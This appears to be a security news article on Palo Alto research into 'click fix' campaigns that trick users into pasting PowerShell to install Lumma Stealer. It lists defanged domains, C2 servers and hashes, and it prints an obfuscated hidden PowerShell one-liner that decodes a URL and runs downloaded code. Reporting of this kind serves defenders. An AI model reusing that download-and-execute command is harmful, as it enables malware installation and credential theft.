Recent Palo Alto research investigations have revealed the ongoing evolution of “click fix” style campaigns used to distribute the Lumma Stealer malware.
These campaigns exploit user interaction by leveraging malicious scripts that are inserted into the copy-paste buffer, tricking victims into executing harmful commands.
The “click fix” distribution method involves malicious web pages that display instructions for users to open a run window, paste a preloaded PowerShell script from their clipboard, and execute it. This deceptive technique capitalizes on user trust and often impersonates legitimate services to avoid suspicion.
Attackers are continuously refining their methods to evade detection and increase the success rate of these campaigns. Recent developments include:
- Domain Impersonation: Registering domain names that mimic legitimate services to gain user trust (e.g.,
windows-update[.]site). - Abuse of Trusted Platforms: Hosting malicious pages on reputable platforms like Google Sites.
- PowerShell Script Delivery: Using data binaries that combine text and binary data, enabling them to execute as PowerShell scripts.
- DLL Side-Loading: Distributing zip archives containing decoy files and legitimate executables to side-load Lumma Stealer DLLs.
The campaigns demonstrate ongoing evolution in the attackers’ methods as they attempt to evade detection while maintaining effectiveness across multiple distribution channels.
Malicious Activity
Example 1: Fake Google Meet Page
A fake Google Meet page hosted on sites.google[.]com instructs users to run a PowerShell command that downloads and executes a script from tlgrm-redirect[.]icu. The infection process involves:
- Downloading a zip archive (
plsverif[.]cfd/1.zip) containing Lumma Stealer files. - Extracting and executing a DLL (
DuiLib_u.dll) via side-loading.
Example 2: Fake Windows Update Site
The site windows-update[.]site prompts users to execute a PowerShell command that downloads a file (overcoatpassably[.]shop/Z8UZbPyVpGfdRS/maloy[.]mp4). This file contains ASCII text and binary data capable of running as a PowerShell script.
The PowerShell commands used in these campaigns are crafted to obfuscate malicious intent. For example:
powershellpowershell -w hidden -c $a='[base64 text removed]'; $b=[Convert]::FromBase64String($a);$c=[System.Text.Encoding]::UTF8.GetString($b);Invoke-Expression (Invoke-WebRequest -Uri $c).Content
This command decodes Base64 text into a malicious script, which is then executed.
Malicious traffic patterns observed during infections include:
- HTTP POST requests to
tlgrmverif[.]cyou/log.php, confirming successful execution of various stages. - Downloads from domains like
plsverif[.]cfdandovercoatpassably[.]shop.
Active Lumma Stealer C2 Domains
Active command-and-control (C2) domains for Lumma Stealer include:
web-security3[.]comtechspherxe[.]top
Inactive C2 domains that no longer resolve include:
hardswarehub[.]todayearthsymphzony[.]today
Key files associated with these campaigns include:
- A PowerShell script retrieved from
tlgrm-redirect[.]icu/1.txt(SHA256: 909ed8a135…). - A zip archive containing Lumma Stealer files (
plsverif[.]cfd/1.zip, SHA256: 0608775a345…). - A DLL side-loaded by a legitimate EXE (
DuiLib_u.dll, SHA256: b3e8b610ef…).
Indicators of Compromise
Active Domains Hosting Malicious Pages
windows-update[.]site(registered February 19, 2025)sites[.]google[.]com/view/get-access-now-test/verify-your-account
Associated Domains
Domains linked to these campaigns include:
authentication-safeguard[.]com(registered January 17, 2025)plsverif[.]cfd(registered March 1, 2025)tlgrmverif[.]cyou(registered January 11, 2025)
The evolving tactics in these “click fix” campaigns highlight the sophistication of modern malware distribution techniques.
By abusing trusted platforms and employing advanced obfuscation methods, attackers are successfully bypassing traditional detection mechanisms.
Organizations must remain vigilant, implement robust security measures, and educate users about the risks of executing unverified scripts.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates
